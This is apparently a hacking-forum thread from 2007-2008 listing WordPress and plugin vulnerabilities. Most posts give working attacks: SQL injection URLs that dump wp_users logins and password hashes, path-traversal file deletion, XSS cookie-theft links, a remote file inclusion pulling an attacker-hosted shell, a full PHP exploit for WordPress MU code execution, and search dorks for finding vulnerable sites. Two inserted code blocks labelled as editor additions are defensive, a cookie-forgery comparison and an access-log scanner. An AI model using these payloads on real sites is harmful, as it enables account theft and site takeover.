[ WordPress vulnerability overview ]

Discussion in 'Web vulnerabilities' started by ettee, 5 Oct 2007.

  1. Solide Snake

    Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability

    The file manager is located here:

    Code:
    http://[TARGET]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php
    After uploading, you will find the script in this directory:

    Code:
    http://[TARGET]/[path_wordpress]/uploaded/[evil].(php)
    Search query:

    Code:
    plugins/wp-filemanager/
    inurl:/wp-filemanager/
  2. ettee

    Code:
    /wp-admin/index.php?page=\..\..\file.php
    /wp-admin/index.php?page=\..\..\.htaccess
    /wp-admin/link-manager.php?page=\..\..\.htaccess
    /wp-admin/link-add.php?page=\..\..\.htaccess
    /wp-admin/link-categories.php?page=\..\..\.htaccess
    /wp-admin/link-import.php?page=\..\..\.htaccess
    /wp-admin/theme-editor.php?page=\..\..\.htaccess
    /wp-admin/plugin-editor.php?page=\..\..\.htaccess
    /wp-admin/profile.php?page=\..\..\.htaccess
    /wp-admin/users.php?page=\..\..\.htaccess
    /wp-admin/options-general.php?page=\..\..\.htaccess
    /wp-admin/options-writing.php?page=\..\..\.htaccess
    /wp-admin/options-reading.php?page=\..\..\.htaccess
    /wp-admin/options-discussion.php?page=\..\..\.htaccess
    /wp-admin/options-permalink.php?page=\..\..\.htaccess
    /wp-admin/options-misc.php?page=\..\..\.htaccess
    /wp-admin/import.php?page=\..\..\.htaccess
    /wp-admin/admin.php?page=\..\..\.htaccess
    /wp-admin/bookmarklet.php?page=\..\..\.htaccess
    /wp-admin/cat-js.php?page=\..\..\.htaccess
    /wp-admin/inline-uploading.php?page=\..\..\.htaccess
    /wp-admin/options.php?page=\..\..\.htaccess
    /wp-admin/profile-update.php?page=\..\..\.htaccess
    /wp-admin/sidebar.php?page=\..\..\.htaccess
    /wp-admin/user-edit.php?page=\..\..\.htaccess
    Windows only
    #22 ettee, 7 Jan 2008
    Last edited: 7 Jan 2008
  3. halkfild

    WordPress <=2.3.1 Cookies Manipulation - Login via the md5() password hash in cookies

    Program: WordPress 2.3.1 and earlier versions
    Severity: Low
    Exploit available: No
    Description:
    The vulnerability allows a remote user to bypass certain security restrictions.

    The vulnerability exists because an attacker can construct the two authentication cookies ("wordpressuser_*" and "wordpresspass_*") from data in the "users" table and gain administrative access to the application. Successful exploitation requires read access to the "users" table in the database.

    Description and site:
    http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt

    ==================================

    PHP:
    // $siteurl is read from the database; $host is the alternative described below
    $cookie_user = 'wordpressuser_' . md5($siteurl) . '=' . $login;
    $cookie_pass = 'wordpresspass_' . md5($siteurl) . '=' . md5(md5($pass));
    Here $siteurl is a value stored in the DB:
    wp_options
    -siteurl

    So with a SQL injection it is worth pulling that out as well: (select siteurl from wp_options)

    Sometimes one WordPress install is used for several domain names.
    In that case $host is used instead of $siteurl; it is effectively the URL path to the blog, for example:
    http://wordpress.com/blog
    without a trailing slash.



    NEW! Addendum.

    COOKIEHASH disclosure.

    There is no need to obtain siteurl, md5 it and verify it at all.

    It is enough to send a POST request to wp-pass.php or to wp-login.php.
    The response returns the valid COOKIEHASH of the cookie.

    [-1-] /wp-login.php?action=logout

    [-2-] wp-pass.php

    Code:
    POST /wordpress/wp-pass.php HTTP/1.0
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 18

    post_password=test

    #23 halkfild, 14 Jan 2008
    Last edited by a moderator: 13 Jun 2008
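Added example (this editor's, not code from the post or from WordPress): it reproduces the cookie scheme the post describes and checks it against an illustrative keyed, expiring design, showing that a database dump alone is enough to satisfy the first and not the second. SITEURL, USER_LOGIN, the password and the server secret are constructed values; the keyed scheme is an assumption of this example, not WordPress's later implementation.

```python
import hashlib
import hmac
import secrets
import time

# Constructed stand-ins for the two database values the post relies on:
# wp_options.siteurl (no trailing slash) and wp_users.user_pass (a plain md5 in <= 2.3.1).
SITEURL = "http://wordpress.example/blog"
USER_LOGIN = "admin"
USER_PASS_MD5 = hashlib.md5(b"correct horse").hexdigest()
DB_USERS = {USER_LOGIN: USER_PASS_MD5}   # what a SQL injection on wp_users would expose


def cookiehash(siteurl):
    """COOKIEHASH in WordPress <= 2.3.1: md5 of the site URL, nothing secret."""
    return hashlib.md5(siteurl.encode()).hexdigest()


def legacy_cookies(siteurl, user_login, user_pass_md5):
    """The cookie pair the post describes; every input comes from the database."""
    h = cookiehash(siteurl)
    return {"wordpressuser_" + h: user_login,
            "wordpresspass_" + h: hashlib.md5(user_pass_md5.encode()).hexdigest()}


def legacy_is_valid(cookies, siteurl, db_users):
    """Server-side check of the legacy scheme: no key, no expiry."""
    h = cookiehash(siteurl)
    login = cookies.get("wordpressuser_" + h)
    if login is None or login not in db_users:
        return False
    expected = hashlib.md5(db_users[login].encode()).hexdigest()
    return hmac.compare_digest(cookies.get("wordpresspass_" + h, ""), expected)


def keyed_cookie(user_login, user_pass_hash, expiration, secret):
    """Illustrative hardened design (an assumption of this example, not WordPress
    code): an HMAC under a key derived from a server-side secret plus a fragment
    of the stored password hash. A database dump no longer yields the key, the
    value expires, and a password change invalidates it. Logins must not contain '|'."""
    material = f"{user_login}|{user_pass_hash[8:12]}|{expiration}".encode()
    key = hmac.new(secret, material, hashlib.sha256).digest()
    mac = hmac.new(key, f"{user_login}|{expiration}".encode(), hashlib.sha256).hexdigest()
    return f"{user_login}|{expiration}|{mac}"


def keyed_is_valid(cookie, db_users, secret, now=None):
    """Recompute from the stored hash and compare in constant time; reject expired values."""
    parts = cookie.split("|")
    if len(parts) != 3 or not parts[1].isdigit():
        return False
    user_login, expiration = parts[0], int(parts[1])
    if expiration < (now if now is not None else int(time.time())):
        return False
    pass_hash = db_users.get(user_login)
    if pass_hash is None:
        return False
    return hmac.compare_digest(keyed_cookie(user_login, pass_hash, expiration, secret), cookie)


def forgery_demo():
    """Attacker model from the post: read access to wp_options and wp_users only."""
    server_secret = secrets.token_bytes(32)   # kept in the config file, not in the DB
    exp = 2_000_000_000
    forged_legacy = legacy_cookies(SITEURL, USER_LOGIN, USER_PASS_MD5)
    forged_keyed = keyed_cookie(USER_LOGIN, USER_PASS_MD5, exp, b"attacker guess")
    genuine_keyed = keyed_cookie(USER_LOGIN, USER_PASS_MD5, exp, server_secret)
    return {
        "legacy_forgery_accepted": legacy_is_valid(forged_legacy, SITEURL, DB_USERS),
        "keyed_forgery_accepted": keyed_is_valid(forged_keyed, DB_USERS, server_secret, now=exp - 1),
        "keyed_genuine_accepted": keyed_is_valid(genuine_keyed, DB_USERS, server_secret, now=exp - 1),
        "keyed_expired_accepted": keyed_is_valid(genuine_keyed, DB_USERS, server_secret, now=exp + 1),
    }


if __name__ == "__main__":
    for name, accepted in forgery_demo().items():
        print(f"{name}: {accepted}")
```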
  4. ettee

    File locations
    Code:
    blogscout
    lectblog
    blogs
    blog
    blog-*
    blog*
    myblog
    bloggt
    blo
    *-blog
    wp
    wordpress
    wordpress.1
    wordpress-1
    wordpress_1
    wordpress-*
    wordpress_*
    weblog
    webblog
    webblogs
    web-blog
    my-journals
    myjournal
    my-favorite-blog
    myblog
    myblogs
    my-blogs
    wp1-5
    wp2.2
    wp2-2
    wp2.3
    wp2-3
    wp2.2
    wp2.0
    powered-by-wordpress
    wordpress-mu
    wordpress_1_5
    wordpress-1.5
    wordpress-1-5-1
    wordpress-1.5.2	
    wordpress-1.0.2
    wordpress-1-2-2
    wordpress_2.0_only
    wordpress_2.3-series
    wordpress_2.3.2
    wordpress_2-3-1
    Wordpress_2.4
    Wordpress_2.5
    Wordpress_2-5
    wordpress_2.3.1
    wordpress_2.0.2
    wordpress_2.3
    wordpress_2.0.7
    Wordpress_2.4
    wordpress_2.2.3
    wordpress_2.1.2
    WordPress_2.4
    wordpress_2.3.1
    WordPress_2-3
    WordPress_2-2-2	
    WordPress_2-3-3
    wordpress_2-3
    Wordpress_2-2
     
  5. +toxa+

    Democracy 2.0.1 HTML Injection Vulnerability

    Code:
    http://wordpress.dom/blah'style=xss:expression(alert(document.cookie)); (Tested on IE7)
    OR
    http://wordpress.dom/blah'onMouseOver=javascript:alert(document.cookie);// (Tested on Firefox & IE)
    fix
    PHP:
    Vulnerable code in class.php (line 166):
    $url = htmlspecialchars(add_query_arg(array('dem_action' => 'view', 'dem_poll_id' => $this->id)));

    Change to:
    $url = htmlspecialchars(add_query_arg(array('dem_action' => 'view', 'dem_poll_id' => $this->id)), ENT_QUOTES);
  6. +toxa+

    WP TextLinkAds Plugin SQL Injection Vulnerability

    Code:
    http://wordpress-blog/?textlinkads_action=sync_posts&textlinkads_post_id='/**/U/**/S/**/1,user_login,user_pass,display_name/**/from/**/wp_users%23
    fix
    PHP:
    The vulnerable code is found on line 512:
    $postId = $postId;
    This variable is passed to $wpdb->get_results without being sanitised.
    To fix this hole, simply change the above line to:
    $postId = (int) $postId;
  7. iddqd

    WordPress<=2.0.3 Arbitrary file deletion

    Windows only:

    HTML:
    http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
    This can also be used for a DoS attack: if index.php is deleted, the site stops functioning normally.

    WordPress<=2.0.3 DoS:


    HTML:
    http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
    Windows only:
    HTML:
    http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php
    XSS:

    HTML:
    http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    XSS: wp-cat2tag converter:
    HTML:
    http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&--><script>alert(/XSS/)</script>
    Vulnerable: WordPress <= 2.0.11 and potentially later versions (2.1.x, 2.2.x and 2.3.x).
    #27 iddqd, 19 Jan 2008
    Last edited by a moderator: 24 Jan 2008
  8. Solide Snake

    Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability

    Code:
                 remote sql injection exploit
    ###############################################################
                       
    
    # >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.
    
    # >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*      
    
    (wp_tbv_users)
    
    # >>> google: Fredrik Fahlstad. Version: 1.7.4.
    
    # >>> author  websec Team  ./members =====>  Virus_C, Refresh , Virusa
    
    # >>> page : hacking.ge
    
    ###############################################################
    
    this is example
    
    http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*
    
    # milw0rm.com [2008-01-19]
     
    #28 Solide Snake, 20 Jan 2008
    Last edited by a moderator: 24 Jan 2008
  9. _-Ramos-_

    XSS in the wp-slimstat 0.92 plugin for WordPress

    PoC directly:
    Code:
    http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss]
    PoC in Perl:
    Code:
    # Wordpress 2.3 0day exploit – http://xssworm.com
    #
    # A bug exist in wordpress 2.3 that allow hacker to
    # steal blog cookie from wordpress blogmin.
    #
    # To exploit scripting bug the attacker make link
    # to URL of slimstat with XSS shellcode and force
    # blog admin to hit link by embedding into fish
    # email or making blogmin follow interesting links.
    # Also hacker can embed into refer or trackback
    # to inject scripting into wordpress dashboard or
    # make blogmin visit malicious resource when viewing
    # he’s blog.
    #
    #
    # Status: not patched published 0day vulnerability
    # Vendor: wordpress.org
    # Credit: http://xssworm.com
    # Discovery: 1st November 2007
    # Exploit developer: Fracesco Vaj (vaj@xssworm.com)
    #
    # Instruction:
    # To execute exploit for wordpress you will need perl or linux
    #
    # Usage:
    #
    # Execute with perl or linux as:
    # perl wordpress-2.3-0day-xss-injection-bug.pl
    #
    # Hacker will get prompts for target information.
    # Please do not use for irresponsible hacking or to make money.
    # Disclaimer: XSSWORM.COM is not responsible.
    #
    #
     
    use strict;
    use warnings;
    #use Net::DNS:Simple;
    #use Math;
    use Socket;

    print "Welcome. What is target email address of wordpress blog admin : \n";
    my $target = <STDIN>;
    chomp $target;
    print "ok target is $target\n";
    sleep(3);
    print "ok What is address of wordpress blog : \n";
    sleep(5); my $address = <STDIN>;
    chomp $address;
    print "ok address is $address\n";
    sleep(6);
    # print "testing"
    print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n";
    print "\n\n — CUT OUTPUT HERE — \n\n";
    print "HELO xssworm.com\n";
    print "RSET\n";
    print "MAIL FROM: <xssworm\@hotmail.com>\n";
    print "RCPT TO: <$target>\n";
    print "DATA\n"; print "Free x picture and movies at $address\n";
    print "\r\n.\r\nquit\r\n";
    print "\n\n — END OF OUTPUT CUT HERE –\n";
    print "";
    print "Ok now you need to cut the exploit above and paste it to:\n";
    print "$address : 25 \n";
    print "Shellcode by vaj\@xssworm.com c. 2007\n";
    print "End of attack.\n";
    print "";
    #print "Debug mode on"
    #print "XSS initialized"
    #payload
    sleep(1); exit(0);
    # snips
  10. ettee

    Full path disclosure:
    Code:
    /wp-admin/theme-editor.php?page=
    /wp-admin/plugins.php?page=
    /wp-admin/plugin-editor.php?page=
    /wp-admin/profile.php?page=
    /wp-admin/users.php?page=
    /wp-admin/options-general.php?page=
    /wp-admin/cat-js.php?page=
    /wp-admin/inline-uploading.php?page=
    /wp-admin/options.php?page=
    /wp-admin/profile-update.php?page=
    /wp-admin/sidebar.php?page=
    /wp-admin/user-edit.php?page=
    /wp-admin/admin.php?page=
    /wp-admin/admin-footer.php
    /wp-admin/admin-functions.php
    /wp-admin/edit-form.php
    /wp-admin/edit-form-advanced.php
    /wp-admin/edit-form-comment.php
    /wp-admin/edit-link-form.php
    /wp-admin/index.php?page=
    /wp-admin/link-manager.php?page=
    /wp-admin/link-add.php?page=
    /wp-admin/link-categories.php?page=
    /wp-admin/link-import.php?page=
    /wp-admin/edit-page-form.php
    /wp-admin/menu.php
    /wp-admin/menu-header.php
    /wp-admin/import/blogger.php
    /wp-admin/import/dotclear.php
    /wp-admin/import/greymatter.php
    /wp-admin/import/livejournal.php
    /wp-admin/options-writing.php?page=
    /wp-admin/options-reading.php?page=
    /wp-admin/options-discussion.php?page=
    /wp-admin/options-permalink.php?page=
    /wp-admin/options-misc.php?page=
    /wp-admin/import.php?page=
    /wp-admin/import/mt.php
    /wp-admin/import/rss.php
    /wp-admin/import/textpattern.php
    /wp-admin/bookmarklet.php?page=
     
  11. Elekt


    =====================

    Changes between versions, for general reference:

    _http://trac.wordpress.org/changeset?old_path=tags%2F2.3.1&old=6528&new_path=tags%2F2.3.2&new=6528

    _http://trac.wordpress.org/query?component=Security&milestone=2.3.2&order=priority

    =====================

    Description: Login/password brute force that bypasses logging.

    It is possible to determine a valid login and brute-force the password via cookies (wp-login.php) and via basic authentication (wp-app.php).

    PHP:
    function wp_login()

    __('<strong>ERROR</strong>: Invalid username.');
    __('<strong>ERROR</strong>: Incorrect password.');
    ========================

    Description: COOKIEHASH disclosure.

    Sometimes there are problems building the cookies for the exploit.
    This usually happens when the blog serves several domains/subdomains at once.
    The "siteurl" taken from the database does not fit.
    In the response header we get back an empty cookie with the prefix.

    /wp-login.php?action=logout

    /wp-pass.php

    =====================

    Description: Admin rights: writing to wp-config.php

    No check of the file name on write.

    Reading wp-config.php is not allowed. But the check was forgotten for writing.

    One can point the blog at one's own remote server and administer it through one's own DB.


    Cannot read:
    /wp-admin/templates.php?file=wp-config.php

    But can write:
    /wp-admin/templates.php
    POST: newcontent=<?php;phpinfo();?>&action=update&file=wp-config.php

    =====================

    Description: Passive XSS $_POST['pages-sortby']

    Rights: admin

    Examples of vulnerable code:

    /wp-admin/widgets.php

    PHP:
    function wp_widget_pages_control() {

            $sortby = stripslashes( $_POST['pages-sortby'] );

                        <option value="post_title"<?php selected( $options['sortby'], 'post_title' ); ?>><?php _e('Page title'); ?></option>
                        <option value="menu_order"<?php selected( $options['sortby'], 'menu_order' ); ?>><?php _e('Page order'); ?></option>
                        <option value="ID"<?php selected( $options['sortby'], 'ID' ); ?>><?php _e( 'Page ID' ); ?></option>
    =====================

    Description: The admin's mail login and password are stored in the DB in plaintext and displayed in the admin panel.

    /wp-admin/options-writing.php

    wp_options
    -mailserver_login
    -mailserver_pass

    =====================

    Description: When importing a blog, if there are posts without an author (anonymous), a user is created with default settings.

    That is, accounts with the default password "password" may exist.

    Examples of vulnerable code:

    /wp-admin/import/greymatter.php

    PHP:
                    $user_id = username_exists($post_author);
                    if (!$user_id) {    // if deleted from GM, we register the author as a level 0 user
                        $user_ip="127.0.0.1";
                        $user_domain="localhost";
                        $user_browser="server";
                        $user_joindate="1979-06-06 00:41:00";
                        $user_login=$wpdb->escape($post_author);
                        $pass1=$wpdb->escape("password");
                        $user_nickname=$wpdb->escape($post_author);
                        $user_email=$wpdb->escape("user@deleted.com");
                        $user_url=$wpdb->escape("");
                        $user_joindate=$wpdb->escape($user_joindate);

                        $user_info = array("user_login"=>$user_login, "user_pass"=>$pass1, "user_nickname"=>$user_nickname, "user_email"=>$user_email, "user_url"=>$user_url, "user_ip"=>$user_ip, "user_domain"=>$user_domain, "user_browser"=>$user_browser, "dateYMDhour"=>$user_joindate, "user_level"=>0, "user_idmode"=>"nickname");
                        $user_id = wp_insert_user($user_info);
                        $this->gmnames[$postinfo[1]] = $user_id;

    =====================
    #31 Elekt, 24 Jan 2008
    Last edited: 28 Jan 2008
  12. halkfild

    # Author : Houssamix From H-T Team
    # Script : Wordpress Plugin fGallery 2.4.1
    # Download : http://www.fahlstad.se/wp-plugins/fgallery/
    # BUG : Remote SQL Injection Vulnerability
    # Dork : inurl:/wp-content/plugins/fgallery/

    ## Vulnerable CODE :
    ~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~

    PHP:
    $cat = $wpdb->get_row("SELECT * FROM $cats WHERE id = $_GET[album]");
    $images = $wpdb->get_results("SELECT * FROM $imgs WHERE cat = $_GET[album] AND status = 'include'");
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    # Exploit :
    [Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

    Example

    # Script : Wordpress Plugin WP-Cal
    # Download : http://www.fahlstad.se/wp-plugins/wp-cal/
    # BUG : Remote SQL Injection Vulnerability
    # Dorks : inurl:/wp-content/plugins/wp-cal/
    inurl:/WP-Cal/

    ## Vulnerable CODE :
    ~~~~~~~ /wp-content/plugins/wp-cal/functions/editevent.php ~~~~~~~~~~~~~
    PHP:
    $id = $_GET['id'];

    $event = $wpdb->get_row("SELECT * FROM $table WHERE id = $id");
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    # Exploit :
    /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--

    example :
     
  13. Solide Snake

    Wordpress Plugin wp-adserve (adclick.php) SQL Injection

    SQL Injection:

    Code:
    http://www.site.com/wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users
    Search query:

    Code:
    allinurl: "wp-adserve"

    Wordpress Plugin WassUp 1.4.1 Remote SQL Injection

    SQL Injection:

    Code:
    http://www.site.com/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%200,1,2,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,0x7c,6,0x7c,8,9,10%20%20from%20wp_users
    Search query:

    Code:
    allinurl: "plugins/wassup"
    (c)
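Added example (this editor's, not code from the thread): a small access-log scanner that normalises request targets and flags the request shapes the PoCs in this and the earlier posts share: union/select reads of wp_users, the Windows `\..\..` traversal, script injection in a parameter, `<?php` in a parameter, and parameters carrying a remote URL. The log lines, hosts and addresses are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# CLF-style access log line: client, timestamp, request line, status (assumed format).
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Rules run against the normalised target (decoded, lower-cased, SQL comment and
# '+' separators collapsed to spaces). Kept deliberately narrow to limit false positives.
RULES = [
    ("sqli-union",   re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("sqli-wpusers", re.compile(r"\bfrom\s+wp_\w*users\b")),
    ("traversal",    re.compile(r"\.\.[\\/]")),
    ("xss",          re.compile(r"<script|\bon(?:mouseover|load|error|click|focus)\s*=|"
                                r"style\s*=[^&]*expression\s*\(")),
    ("php-inject",   re.compile(r"<\?php|\bsystem\s*\(")),
]

# Constructed sample log: one benign page view, one request per PoC shape, one benign POST.
SAMPLE_LOG = [
    r'192.0.2.10 - - [19/Jan/2008:10:00:01 +0300] "GET /blog/?p=12 HTTP/1.1" 200 5120',
    r'192.0.2.11 - - [19/Jan/2008:10:00:02 +0300] "GET /blog/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass),3%20from%20wp_users-- HTTP/1.1" 200 812',
    r'192.0.2.12 - - [19/Jan/2008:10:00:03 +0300] "GET /blog/wp-admin/index.php?page=\..\..\.htaccess HTTP/1.1" 200 233',
    r'192.0.2.13 - - [19/Jan/2008:10:00:04 +0300] "GET /blog/wp-content/plugins/wp-footnotes/admin_panel.php?s[x]=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1002',
    r'192.0.2.14 - - [19/Jan/2008:10:00:05 +0300] "GET /blog/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.invalid/x.txt? HTTP/1.1" 200 77',
    r'192.0.2.15 - - [19/Jan/2008:10:00:06 +0300] "GET /blog/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22); HTTP/1.1" 200 61',
    r'192.0.2.16 - - [19/Jan/2008:10:00:07 +0300] "POST /blog/wp-pass.php HTTP/1.0" 302 0',
]


def normalise(target):
    """Decode twice (tolerates one layer of double encoding), treat the /**/ comments
    and '+' that several PoCs use as spaces as real spaces, collapse whitespace, lower-case."""
    t = unquote_plus(unquote_plus(target))
    t = re.sub(r"/\*.*?\*/", " ", t)
    return re.sub(r"\s+", " ", t).lower()


def remote_url_params(target):
    """Names of query parameters whose value is an absolute URL (the RFI shape)."""
    query = urlsplit(target).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if re.match(r"https?://", unquote_plus(value), re.I)]


def classify(target):
    """Return the set of rule names that fire for one request target."""
    norm = normalise(target)
    tags = {name for name, rx in RULES if rx.search(norm)}
    if remote_url_params(target):
        tags.add("rfi-candidate")
    return tags


def scan(lines):
    """Return (client, method, target, sorted tags) for every flagged request."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        client, method, target, _status = m.groups()
        tags = classify(target)
        if tags:
            hits.append((client, method, target, sorted(tags)))
    return hits


if __name__ == "__main__":
    for client, method, target, tags in scan(SAMPLE_LOG):
        print(f"{client} {method} {','.join(tags)} {target}")
```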
     
  14. iddqd

    Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities

    PoC:

    http://milw0rm.com/exploits/5035

    Wordpress Plugin Wordspew Remote SQL Injection Vulnerability

    PoC:

    http://milw0rm.com/exploits/5039
     
  15. iddqd

    Wordpress Plugin wp-footnotes 2.2

    Multiple XSS

    Code:
    http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]="><script>alert("XSS")</script>

    http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=</textarea><script>alert("XSS")</script>

    http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=</textarea><script>alert("XSS")</script>

    http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=</textarea><script>alert(":-(")
     
  16. Solide Snake

    Wordpress Plugin st_newsletter Remote SQL Injection

    SQL Injection

    Code:
    wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
    Search query:

    Code:
    allinurl :"wp-content/plugins/st_newsletter"
    allinurl :"shiftthis-preview.php"
    (c)
     
  17. iddqd

    Wordpress MU < 1.3.2 active_plugins option Code Execution

    Exploit:

    PHP:
    <?php
    /*
    WordPress [MU] blog's options overwrite

    Credits : Alexander Concha <alex at buayacorp dot com>
    Website : http://www.buayacorp.com/
    Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html

    This exploit uses active_plugins option to execute arbitrary PHP
    */
    include_once './class-snoopy.php';

    // Fix Snoopy
    class SnoopyExt extends Snoopy {
        function _prepare_post_body($formvars, $formfiles) {
            if ( is_string($formvars) ) {
                return $formvars;
            }
            return parent::_prepare_post_body($formvars, $formfiles);
        }
    }

    set_time_limit(0);

    // Any user with 'manage_options' and 'upload_files' capabilities
    $user = 'user';
    $pass = '1234';
    $blog_url = 'http://localhost.localdomain/mu/';
    $remote_file = ''; // relative path to wp-content
    $local_file = ''; // the contents of this file, if any, will be uploaded

    $snoopy = new SnoopyExt();

    $snoopy->maxredirs = 0;
    $snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check';
    $snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass));

    $snoopy->setcookies(); // Set auth cookies for future requests

    if ( empty($remote_file) ) {
        // Upload a new file
        $snoopy->_submit_type = 'image/gif';
        $snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents());

        if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) {
            $remote_file = basename($match[1]);
        }
    }
    if ( empty($remote_file) ) die('Exploit failed...');

    // Look for real path
    $snoopy->fetch("{$blog_url}wp-admin/export.php?download");

    if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) {
        $remote_file = preg_replace('#.*?wp-content#', '', $match[1]);
    }
    if ( empty($remote_file) ) die('Exploit failed...');

    // It assumes that file uploads are stored within wp-content
    $remote_file = '../' . ltrim($remote_file, '/');

    $snoopy->fetch("{$blog_url}wp-admin/plugins.php");

    // Recover previous active plugins
    $active_plugins = array();
    if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) {
        foreach ($matches[0] as $plugin) {
            if ( preg_match('#plugin=([^&]+)#', $plugin, $match) )
                $active_plugins[] = urldecode($match[1]);
        }
        print_r($active_plugins);
    }
    $active_plugins[] = $remote_file;

    // Fetch a valid nonce
    $snoopy->fetch("{$blog_url}wp-admin/options-general.php");

    if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) {
        // Finally update active_plugins
        $snoopy->set_submit_normal();
        $snoopy->submit("{$blog_url}wp-admin/options.php",
            array(
                'active_plugins' => $active_plugins,
                '_wpnonce' => $match[1],
                'action' => 'update',
                'page_options' => 'active_plugins',
            ));
    }

    function get_contents() {
        global $local_file;

        return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>';
    }
    ?>

    # milw0rm.com [2008-02-05]
  18. FraiDex

    Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability

    example

    Code:
    http://xxxxx/forums?forum=xxxx&topic= (exploit)

    EXPLOIT 1 :


    Code:
    -99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

    EXPLOIT 2 :

    Code:
    SOMETIMES YOU CAN'T SEE (xxxx&topic) SO USE THIS EXPLOIT AFTER forum=xxx(number)

    example


    Code:
    www.xxxxx/forums?forum=1(exploit)
    &topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
    Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability

    example :

    Code:
    http://www.xxx.com/sf-forum?forum=[exploit]
    EXPLOIT 1 :

    Code:
    -99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
    exploit 2 :

    Code:
    -99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*
    (c) milw0rm.com
     
    #38 FraiDex, 15 Feb 2008
    Last edited: 15 Feb 2008
  19. gibson

    Wordpress Photo album Remote SQL Injection Vulnerability

    EXAMPLE
    Exploit
    PS
    Author: S@BUN http://milw0rm.com/exploits/5135
  20. iddqd

    Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities

    RFI

    Register Globals: ON

    PoC:

    Code:
    http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?

    XSS

    Register Globals: ON

    PoC:

    Code:
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
